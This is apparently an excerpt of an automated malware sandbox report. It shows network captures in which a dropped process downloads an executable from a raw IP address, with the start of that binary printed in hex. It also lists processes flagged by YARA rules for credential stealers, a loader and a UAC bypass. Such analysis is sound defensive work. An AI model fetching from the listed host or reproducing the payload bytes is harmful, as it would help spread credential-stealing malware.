                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Content-Length: 300
                                                                                                                                                                                                                            Host: svc.iolo.com
                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                            Apr 25, 2024 09:04:25.278570890 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                            Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                            Apr 25, 2024 09:04:25.479521990 CEST405INHTTP/1.1 200 OK
                                                                                                                                                                                                                            cache-control: private
                                                                                                                                                                                                                            content-length: 192
                                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                                            x-whom: Ioloweb9
                                                                                                                                                                                                                            date: Thu, 25 Apr 2024 07:04:24 GMT
                                                                                                                                                                                                                            set-cookie: SERVERID=svc9; path=/
                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                            Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53
                                                                                                                                                                                                                            Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            8192.168.2.449755185.172.128.203801720C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 25, 2024 09:04:33.992655039 CEST76OUTGET /tiktok.exe HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.203
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199383020 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:34 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT
                                                                                                                                                                                                                            ETag: "85400-616de2c892480"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 545792
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 60 bc 47 00 e8 ab 56 05 00 68 ff be
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B`GVh
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199398041 CEST1289INData Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45
                                                                                                                                                                                                                            Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199410915 CEST1289INData Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58
                                                                                                                                                                                                                            Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199424028 CEST1289INData Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33
                                                                                                                                                                                                                            Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199462891 CEST1289INData Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3
                                                                                                                                                                                                                            Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199506998 CEST1289INData Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d
                                                                                                                                                                                                                            Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199565887 CEST1289INData Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52
                                                                                                                                                                                                                            Data Ascii: APb2|$vWGD$@PjGt=|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$|$8D$$D$4CD$$GhG6'@'@#(@(@*)@*)@
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199579000 CEST1289INData Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6
                                                                                                                                                                                                                            Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199632883 CEST1289INData Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc
                                                                                                                                                                                                                            Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.199646950 CEST1289INData Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00
                                                                                                                                                                                                                            Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
                                                                                                                                                                                                                            Apr 25, 2024 09:04:34.405992031 CEST1289INData Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e
                                                                                                                                                                                                                            Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:09:03:51
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\g77dRQ1Csm.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:425'985 bytes
                                                                                                                                                                                                                            MD5 hash:41DE8E3E7412B6E97B60FDBFDD24B0BA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1773870952.0000000005DF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                            Start time:09:03:58
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\u42w.0.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:279'040 bytes
                                                                                                                                                                                                                            MD5 hash:A0E6719CEB3DC236283AB59B7F39B058
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2090299966.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                            • Detection: 43%, Virustotal, Browse
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:09:04:03
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"
                                                                                                                                                                                                                            Imagebase:0x690000
                                                                                                                                                                                                                            File size:2'469'936 bytes
                                                                                                                                                                                                                            MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            • Detection: 0%, Virustotal, Browse
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:09:04:03
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                            Start time:09:04:03
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:09:04:05
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u42w.3.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\u42w.3.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:4'866'096 bytes
                                                                                                                                                                                                                            MD5 hash:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1772107020.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe, Author: Joe Security
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 4%, ReversingLabs
                                                                                                                                                                                                                            • Detection: 3%, Virustotal, Browse
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:09:04:07
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1180
                                                                                                                                                                                                                            Imagebase:0x4c0000
                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:09:04:26
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                                                                                                                                                                                            Imagebase:0x173ee6e0000
                                                                                                                                                                                                                            File size:59'721'128 bytes
                                                                                                                                                                                                                            MD5 hash:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000000.1978341064.00000173EE71B000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:09:04:27
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"
                                                                                                                                                                                                                            Imagebase:0x690000
                                                                                                                                                                                                                            File size:2'469'936 bytes
                                                                                                                                                                                                                            MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:09:04:27
                                                                                                                                                                                                                            Start date:25/04/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            Imagebase:0xc20000
